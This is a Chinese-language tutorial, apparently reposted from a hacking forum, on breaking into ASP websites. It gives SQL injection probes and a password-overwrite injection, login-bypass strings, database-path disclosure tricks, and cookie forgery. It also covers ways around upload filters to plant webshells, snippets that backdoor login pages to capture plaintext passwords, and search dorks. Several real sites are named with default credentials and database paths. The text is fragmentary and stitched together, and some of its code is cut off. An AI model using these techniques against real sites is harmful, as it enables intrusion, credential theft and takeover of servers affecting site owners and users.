asp網(wǎng)站入侵技術(shù)綜合總結(jié)
當(dāng)前位置:點(diǎn)晴教程→知識(shí)管理交流
→『 技術(shù)文檔交流 』
由于asp系統(tǒng)在互聯(lián)網(wǎng)上廣泛的應(yīng)用,針對(duì)asp系統(tǒng)的腳本攻擊最近鬧得是紅紅火火。在這些攻擊中,
攻擊者多是利用注入、暴庫(kù)、旁注、cookies欺騙等手段獲取管理員的權(quán)限, 通過(guò)直接上傳或后臺(tái)備份等各種入侵手法 取得網(wǎng)站webshell繼而控制整個(gè)站點(diǎn) 接著通過(guò)webshell提升權(quán)限獲取服務(wù)器管理權(quán)限。 什么是webshell?webshell就是一個(gè)相應(yīng)腳本語(yǔ)言編寫(xiě)成的,具有在線編輯、刪除、新增文件、執(zhí)行 程序及sql語(yǔ)句等功能的腳本文件,具有隨意更改目標(biāo)首頁(yè),刪除文件等權(quán)限. 如著名的老兵以及海洋頂端等就是這樣一個(gè)asp腳本文件,我們俗稱大馬以及小馬等. -------------------------------------------------- 二:主要的入侵手段 1.上傳漏洞 一:如典型的動(dòng)網(wǎng)上傳漏洞,我們直接訪問(wèn)上傳頁(yè)面。 二:進(jìn)入網(wǎng)站后臺(tái)直接上傳腳本木馬,獲得webshell. 因?yàn)橛行┚W(wǎng)站系統(tǒng)對(duì)管理員十分信任.進(jìn)入后臺(tái)后,只要找到上傳地點(diǎn).就能任意上傳腳本木馬. 三:添加上傳類型. 如果系統(tǒng)代碼限定了不允許上傳asp文件,那么我們可添加允許上傳asa cer等文件.然后將腳本木馬 后綴名相應(yīng)的修改成asa cer.webshell一樣可以使用。 四:通過(guò)后臺(tái)備份功能恢復(fù)asp后綴名 如果無(wú)法上傳asp.asa.cer等后綴名文件。我們修改腳本木馬后綴名asp為jpg或者gif圖片后綴名 上傳成功后.通過(guò)后臺(tái)備份數(shù)據(jù)庫(kù)功能恢復(fù)文件asp后綴名. 五:抓包上傳 通過(guò)抓取上傳真實(shí)地址以及管理員認(rèn)證數(shù)據(jù)cookies. 然后通過(guò)明小子上傳腳本木馬.獲得webshell. 其實(shí)上傳方法還有很多.不過(guò).也都是在基礎(chǔ)上發(fā)展而來(lái).只要我掌握了知識(shí).學(xué)習(xí)方法就十分的簡(jiǎn)單 2.注入漏洞 在眾多針對(duì)腳本系統(tǒng)的攻擊中,注入可謂是鬧得最紅火的攻擊手段了. 目前引起sql注入的原因主要是程序員在編寫(xiě)帳腳本程序時(shí)對(duì)特殊字符過(guò)濾的不完全引起的. 比如一個(gè)網(wǎng)址 http://xxx.com/asp?id=1 是以id=數(shù)字形式結(jié)尾網(wǎng)址 我們通過(guò) 網(wǎng)址后加上個(gè) and 1=1 和 and 1=2 分別訪問(wèn) 如果加上and 1=1 顯示正常頁(yè)面 加上 and 1=2 顯示出錯(cuò) 返回錯(cuò)誤頁(yè)面 則表示存在注入漏洞 那么一個(gè)網(wǎng)址存在注入漏洞我們?cè)趺慈ダ媚? 首先可以使用工具. 比如明小子.阿d注入工具.猜解帳號(hào)以及密碼等重要信息. 對(duì)于sql數(shù)據(jù)庫(kù)如果無(wú)法破解猜解出來(lái)的md5加密密碼 那么我們可以用以下命令: http://注入網(wǎng)址;update admin set password='新md5密碼' where password='舊md5密碼'-- [admin為表名.] 更改管理員密碼 3.cookie詐騙 cookie是什么呢? cookie是你上網(wǎng)時(shí)由網(wǎng)站所為你發(fā)送的值記錄了你的一些資料,比如ip,姓名密碼等。 怎樣詐騙呢? 如果我們現(xiàn)在已經(jīng)知道了xx站管理員的站號(hào)和md5密碼了 但是破解 不出來(lái)密碼 (md5是加密后的一 個(gè)16位的密碼) 我們就可以用cookie詐騙來(lái)實(shí)現(xiàn),把自己的id修改成管理員的,md5密碼也修改成他的,通過(guò)工具 修改cookie 這樣就答到了cookie詐騙的目的,系統(tǒng)就會(huì)認(rèn)定你就是管理員。 4.旁注 如果你的網(wǎng)站有難度.那么我們就入侵與你同一臺(tái)虛擬機(jī)的網(wǎng)站,通過(guò)入侵別人的網(wǎng)站 拿到系統(tǒng)權(quán)限 也就能控制你的網(wǎng)站 很多網(wǎng)站是存放在同一個(gè)虛擬機(jī)上的,也許某一臺(tái)虛擬機(jī)上有幾百個(gè)網(wǎng)站.那么我們只需要入侵 入侵其中第一個(gè).從而控制全部的網(wǎng)站.就是這么簡(jiǎn)單! 5.暴庫(kù) 一般而言,我們要獲取一個(gè)站點(diǎn)的shell,必須先獲得對(duì)方的后臺(tái)管理權(quán)限,要獲得對(duì)方的管理權(quán)限 當(dāng)然先要得到對(duì)方的管理員用戶以及密碼!得到對(duì)方管理員用戶各種密碼的方法有很多. 通過(guò)下載數(shù)據(jù)庫(kù)后繼而破解md5加密信息.從而獲得管理員賬號(hào). 但是一個(gè)網(wǎng)站的數(shù)據(jù)庫(kù)當(dāng)然不會(huì)讓你隨意下載到. 那么我們?cè)趺慈フ覕?shù)據(jù)庫(kù)地址呢? 最簡(jiǎn)單的就是暴庫(kù)了. 通過(guò)服務(wù)器返回的錯(cuò)誤信息提示暴出數(shù)據(jù)庫(kù)地址的。 但是,這漏洞并不見(jiàn),畢竟直接暴露出系統(tǒng)的數(shù)據(jù)庫(kù).這是多么危險(xiǎn)的事情呢! 暴庫(kù)方法:比如一個(gè)站的地址為 http://xxx.com/xxx.asp?id=1&id=2 我們將com/dispbbs中間的/換成%5c 如果存在暴庫(kù)漏洞 既可直接暴露出數(shù)據(jù)庫(kù)的絕對(duì)路徑 使用工具 迅雷等下載即可 還有利用默認(rèn)的數(shù)據(jù)庫(kù)路徑 http://xxx.com/ 后面加上 conn.asp 如果沒(méi)有修改默認(rèn) 的數(shù)據(jù)庫(kù)路徑也可以得到數(shù)據(jù)庫(kù)的路徑(注意:這里的/也要換成%5c) 那么暴庫(kù)的目的就是為了下載數(shù)據(jù)庫(kù)得到管理員賬號(hào)后上傳木馬腳本 6.默認(rèn)漏洞 同一個(gè)網(wǎng)站系統(tǒng)或許有成千上萬(wàn)的網(wǎng)站在使用這套系統(tǒng) 而每一套網(wǎng)站系統(tǒng),當(dāng)然有它最初默認(rèn)的安裝路徑以及賬號(hào)密碼等 我們通過(guò)大批量的搜索使用這套網(wǎng)站系統(tǒng)幾百萬(wàn)個(gè)網(wǎng)站 找到那些沒(méi)有修改默認(rèn)設(shè)置的網(wǎng)站,沒(méi)有修改管理賬號(hào),沒(méi)有修改后臺(tái)登陸地址,沒(méi)有修改數(shù)據(jù)庫(kù)存 放地址的目標(biāo) 進(jìn)行入侵! -------------------------------------------------- 看完上面的介紹 基于根本.所謂的入侵也就利用這些常見(jiàn)的微乎其微的小漏洞. 并沒(méi)有什么驚天動(dòng)地的 沒(méi)有什么所謂黑客 可以一下子沒(méi)有任何基礎(chǔ)原理和方法 去入侵某個(gè)網(wǎng)站或服務(wù)器 那么我們是怎么入侵的? 無(wú)非的懂的多。知道的多. 我們無(wú)非是比管理員更渴望知道.服務(wù)器.哪些地方不安全.哪些地方可以被我們所利用 我們無(wú)非是比管理員更關(guān)心最新的系統(tǒng)漏洞 我們無(wú)非是比管理員更勤勞的尋找系統(tǒng)的漏洞 那么其實(shí),只要我們通過(guò)學(xué)習(xí)實(shí)踐操作掌握了這些基礎(chǔ)的知識(shí). 所謂的入侵其實(shí)也就很簡(jiǎn)單. 所以希望大家.學(xué)成以后.不要自以為是. 不過(guò)就是些小漏洞,無(wú)非也就是管理員的疏忽,這又能怎樣? 其實(shí)我們懂的還太少.連電腦也是由美國(guó)的華德·愛(ài)肯所發(fā)明 在我們看天書(shū)一般的英文代碼時(shí).美國(guó)人就像看小說(shuō)一樣能明白代碼的意思 試問(wèn) 這是天與地的差距嗎? 或許,這完全是心靈上的差別. -------------------------------------------------- 三:漏洞利用 入侵指定的目標(biāo),如何去入侵呢? 方法非常簡(jiǎn)單,我們尋找以上的基本漏洞 只要存在這些漏洞,我們就發(fā)起攻擊 為大家介紹一些這些漏洞的利用方法,也就是,找到這些漏洞,我們是為了干什么! 1.上傳漏洞 上傳漏洞利用非常簡(jiǎn)單 就是從這個(gè)上傳漏洞,直接上傳我們的腳本木馬,從而拿到webshell。繼而控制目標(biāo)網(wǎng)站。 2.注入漏洞 注入漏洞分兩種不同類型access數(shù)據(jù)庫(kù)與mssql數(shù)據(jù)庫(kù) 首先,直接利用方法是,猜解管理員賬號(hào)以及密碼。 然后網(wǎng)站登陸后臺(tái),從網(wǎng)站的后臺(tái)找到上傳點(diǎn)。從上傳點(diǎn),上傳腳本木馬。繼而控制目標(biāo)網(wǎng)站。 那么mssql數(shù)據(jù)庫(kù)。還可以猜解網(wǎng)站存放在服務(wù)器中的根目錄,通過(guò)差異備份 備份出一句話,然后通過(guò)一句話木馬客戶端,上傳腳本木馬,從而控制目標(biāo)網(wǎng)站。 3.cookie詐騙 在得到目標(biāo)網(wǎng)站管理員md5加密后的密碼,我們無(wú)法短時(shí)間破解出md5解密后的密碼 怎么辦呢? 我們直接通過(guò) 修改cookie相關(guān)信息 也就是把管理的賬號(hào),id,md5加密的密碼。修改到相應(yīng)的位置 這樣再登陸,系統(tǒng)就認(rèn)為我們就是管理員。 從而我們擁有了管理員的權(quán)限, 這個(gè)時(shí)候,我們就登陸后臺(tái)。找到上傳點(diǎn)。上傳腳本木馬。繼而控制目標(biāo)網(wǎng)站。 4.旁注 旁注,非常有意思。 簡(jiǎn)單的來(lái)說(shuō),網(wǎng)站的服務(wù)器,他是存放在特殊的地方,或者這么說(shuō)。不是私人人經(jīng)營(yíng)的 是由企業(yè)代為管理。 那么企業(yè)當(dāng)然不可能只管理你一個(gè)網(wǎng)站。 所以,一臺(tái)虛擬機(jī),可能有上百個(gè)網(wǎng)站,同時(shí)存放在這臺(tái)虛擬機(jī)上。 那么,我們?cè)囅?,是不是通過(guò)入侵這臺(tái)虛擬機(jī),就達(dá)到控制這一百個(gè)網(wǎng)站的目的呢? 所以呀。就是這么簡(jiǎn)單。不管我們?nèi)肭诌@一百個(gè)網(wǎng)站中哪一個(gè)! 只要我們達(dá)到入侵并控制了這臺(tái)網(wǎng)站服務(wù)器的目的。 我們就達(dá)到了控制這臺(tái)服務(wù)器一百個(gè)網(wǎng)站的目的 5.暴庫(kù) 我們利用暴庫(kù)這個(gè)漏洞是為了什么呢? 顧名思義呀。暴庫(kù)就是暴出目標(biāo)的數(shù)據(jù)庫(kù)地址 想到這里大家都會(huì)笑了吧 我懂了。暴了數(shù)據(jù)庫(kù)地址 當(dāng)然是下載他的數(shù)據(jù)庫(kù) 然后通過(guò)數(shù)據(jù)庫(kù)得到管理員賬號(hào) 通過(guò)管理員賬號(hào),進(jìn)入后臺(tái),接著找上傳點(diǎn),接著上傳腳本木馬,接著呢? 當(dāng)然就是深入的控制目標(biāo)網(wǎng)站的服務(wù)器。 6.默認(rèn)漏洞 默認(rèn)漏洞,這個(gè)就笑呢 低級(jí)錯(cuò)誤嘛。但是卻廣泛的存在于網(wǎng)絡(luò)中 怎么利用呢? 默認(rèn)數(shù)據(jù)庫(kù),我們就利用得到管理賬號(hào)入侵。 默認(rèn)管理員賬號(hào)。我們就通過(guò)登陸后臺(tái)入侵 就是這么簡(jiǎn)單。
關(guān)于制作.. 建一個(gè)asp文件,內(nèi)容為 先用精銳網(wǎng)吧輔助工具得到用戶名和密碼,然后用計(jì)算機(jī)管理聯(lián)結(jié)一臺(tái)機(jī)器,開(kāi)telnet,連接,開(kāi)共享,復(fù)制一個(gè)木馬過(guò)去運(yùn)行即可。 3.名稱:感受md5暴力破解的魅力 rainbowcrack用法先用rtgen生成庫(kù) "rtgen md5 byte 1 7 5 2400 40000 all" 1和7代表密碼最小和最大長(zhǎng)度 阿汀我再加個(gè)方法:http://md5.rednoize.com/ 在線破解 或者到http://md5lookup.com/?category=01-3&searck=on
(1)在我們要做手腳的asp文件里加入如下內(nèi)容 <%if request("action")="ok" then%> (2)另一種方法,在我們要做手腳的asp文件里加入如下內(nèi)容 <% xxx為你本地上傳的一個(gè)路徑如 c:ating123.asp 上傳后在做手腳的asp的同文件夾中有ating,asp
mkdir s… copy ating.asp s…/ 這樣殺毒軟件找不到的 訪問(wèn)http://網(wǎng)站/s…/ating.asp即可。
用戶名為:hack 密碼110,在dos下和計(jì)算機(jī)管理器上看不到你建立的用戶,并且是刪除不掉的。 7.名稱:qq群腳本攻擊 打開(kāi)qq對(duì)話誆,復(fù)制消息,然后,下面的內(nèi)容保存為.vbs 文件,運(yùn)行即可。 set wshshell= wscript.createobject("wscript.shell") 8.搜索:程序制作:萬(wàn)鵬 有免費(fèi)申請(qǐng)空間的,直接上傳asp馬即可。
(1) 用殺毒軟件 (2) 用ftp客戶端軟件,點(diǎn)"工具"->"比較文件夾" (3) 用asplist2.0.asp上傳到站點(diǎn)空間查看,一般功能多的asp我估計(jì)就是asp木馬 (4) 用工具beyond compare
老辦法: 修改admin_login.asp得到明文dvbbs后臺(tái)密碼 在"username=trim(replace(request("username")這行后面 dim fsoobject 只要管理員登陸后臺(tái),在目錄下就生成了laner.txt。
on error resume next 這樣laner.asp將獲得全部登陸人的登陸時(shí)間,用戶名和密碼。
<%if request("n")<>"" and request("p")<>"" then 11. 名稱:利用qq在線狀態(tài)抓鴿子肉雞 生成qq在線狀態(tài),把里面的地址改成木馬地址,發(fā)到論壇在login.asp那里插入一句: response.write""response.write" ("username")&""&"&p="&request("password")&">" 結(jié)果所有登陸人都會(huì)乖乖的把名字和密碼送到你的laner.asp 里 漏洞程序:媒體中國(guó)整站程序(第一版) 官方網(wǎng)站:http://meiti.elgod.com/ 漏洞: %5c(暴庫(kù)) 上傳 注入 上傳頁(yè)面:down1/upload.asp http://globe7.com/ 打開(kāi)主頁(yè),點(diǎn)擊坐下角,free download,下載到本地,安裝,運(yùn)行后,會(huì)提示正在尋找你所在地區(qū)的區(qū)號(hào)。由于是國(guó)際長(zhǎng)途,注冊(cè)一個(gè)帳號(hào),送100美分,國(guó)內(nèi)計(jì)時(shí)0.01/分,你就有100分鐘可以白打。是一個(gè)帳號(hào)哦。 要注意的就是,固定電話,小靈通 形式為0086521123456 521本來(lái)時(shí)0521,要省略前面的零,手機(jī)號(hào)也是一樣。 http://網(wǎng)址/index.php?job=../admin/ban 把其中"禁止搜索的詞"那部分另存出來(lái),里面的地址改完整,插入一句話木馬 15. 名稱:鉤魂者入侵傳奇私服 用百度 搜索 傳奇 inurl:tuku 或者 傳奇 inurl:wplm.htm 再或者 傳奇 inurl:coolsites.asp 友情鏈接里插入一句話木馬即可 官方主頁(yè):http://mu126.com/ 漏洞頁(yè)面:/cx/upfile.asp (上傳漏洞) bbsxp5.16過(guò)濾了 asp,asp,cdx,cer,擴(kuò)展名的文件上傳,就是在基本設(shè)置上添加上上傳類型也不行,并禁止了修改數(shù)據(jù)備份數(shù)據(jù)名稱,我們可以把此網(wǎng)頁(yè)保存在本地,改源代碼上傳。 下載看看吧,不錯(cuò),各大網(wǎng)站都有 在啊d的掃描注入點(diǎn)項(xiàng),打開(kāi)這個(gè):http://google.co.kr/advanced_search?hl=zh-cn 這是高級(jí)搜索項(xiàng),關(guān)鍵字隨便寫(xiě)。這里我寫(xiě)asp?name= 設(shè)置為每頁(yè)顯示100條。 語(yǔ)種選擇韓文。搜索,很多sa. 選智能abc,然后vv輸入,光標(biāo)后退兩步,按delete鍵 剛輸入的兩個(gè)vv刪除, 最后按inter鍵。 現(xiàn)在騰訊已經(jīng)封了很多qq空間代碼了,就如以前 最后附上總結(jié)的
ps: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)"請(qǐng)登陸后使用",80%就有漏洞了! 有時(shí)上傳不一定會(huì)成功,這是因?yàn)閏ookies不一樣.我們就要用wsockexpert取得cookies.再用domain上傳.
ps:對(duì)md5密碼.有時(shí)我們不是哪么容易跑出來(lái).如果是[sql數(shù)據(jù)庫(kù)].那么我們可以用以下命令: http://注入網(wǎng)址;update admin set password=\新md5密碼\ where password=\舊md5密碼\-- [admin為表名.]
我們?nèi)肭帜痴緯r(shí)可能這個(gè)站堅(jiān)固的無(wú)懈可擊,我們可以找下和這個(gè)站同一服務(wù)器的站點(diǎn),然后在利用這個(gè)站點(diǎn)用提權(quán),嗅探等方法來(lái)入侵我們 要入侵的站點(diǎn)。,在這里有個(gè)難點(diǎn),就是一些服務(wù)器的絕對(duì)路徑經(jīng)過(guò)加密,這就看我們的本事了
ey:http://ahttc.edu.cn/otherweb/dz/bgs/bigclass.asp?bigclassname=職責(zé)范圍&bigclasstype=1 如果你能看到:\e:ahttc040901otherwebdzdatabaseixuer_studio.asa\不是一個(gè)有效的路徑。 確定路徑名稱拼寫(xiě)是否正確,以及是否 連接到文件存放的服務(wù)器。 這樣的就是數(shù)據(jù)庫(kù)了。下載時(shí)用flashget換成.mdb格式的就行.
\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a
ey:http://neu.edu.cn/waishi/admin admin waishi
ey:http://ahsdxy.ah.edu.cn/ebook/db/ebook.asp[這個(gè)就是asp格式的數(shù)據(jù)庫(kù)],再寫(xiě)入一句話木馬
ey:http://ahsdxy.ah.edu.cn/xiaoyoulu/index.asp 這個(gè)站用的是:杰出校友錄,源碼我下過(guò)了, 默認(rèn)數(shù)據(jù)庫(kù)/webshell路徑:databaseliangu_data.mdb 后臺(tái)管理:adm_login.asp 密碼及用戶名都是admin
/databackup/dvbbs7.mdb 工具:網(wǎng)站獵手 挖掘雞 ey:http://cl1999.com/bbs/databackup/dvbbs7.mdb
ey:http://ujs168.com/shop/admin/ http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/ 這樣我們可以找到數(shù)據(jù)庫(kù),下載不用我教吧
(1).inurl:flasher_list.asp 默認(rèn)數(shù)據(jù)庫(kù):database/flash.mdb 后臺(tái)/manager/ (2).找網(wǎng)站的管理后臺(tái)地址: site:xxxx.comintext:管理 site:xxxx.comintitle:管理 <關(guān)鍵字很多,自已找> site:xxxx.cominurl:login (3).查找access的數(shù)據(jù)庫(kù),mssql、mysql的連接文件 allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb 我主不做了。。自已做做吧。。
把自己的id修改成管理員的,md5密碼也修改成他的,用桂林老兵工具可以修改cookie。這個(gè)我就不多講了 該文章在 2010/7/14 1:47:04 編輯過(guò) |
關(guān)鍵字查詢
相關(guān)文章
正在查詢... |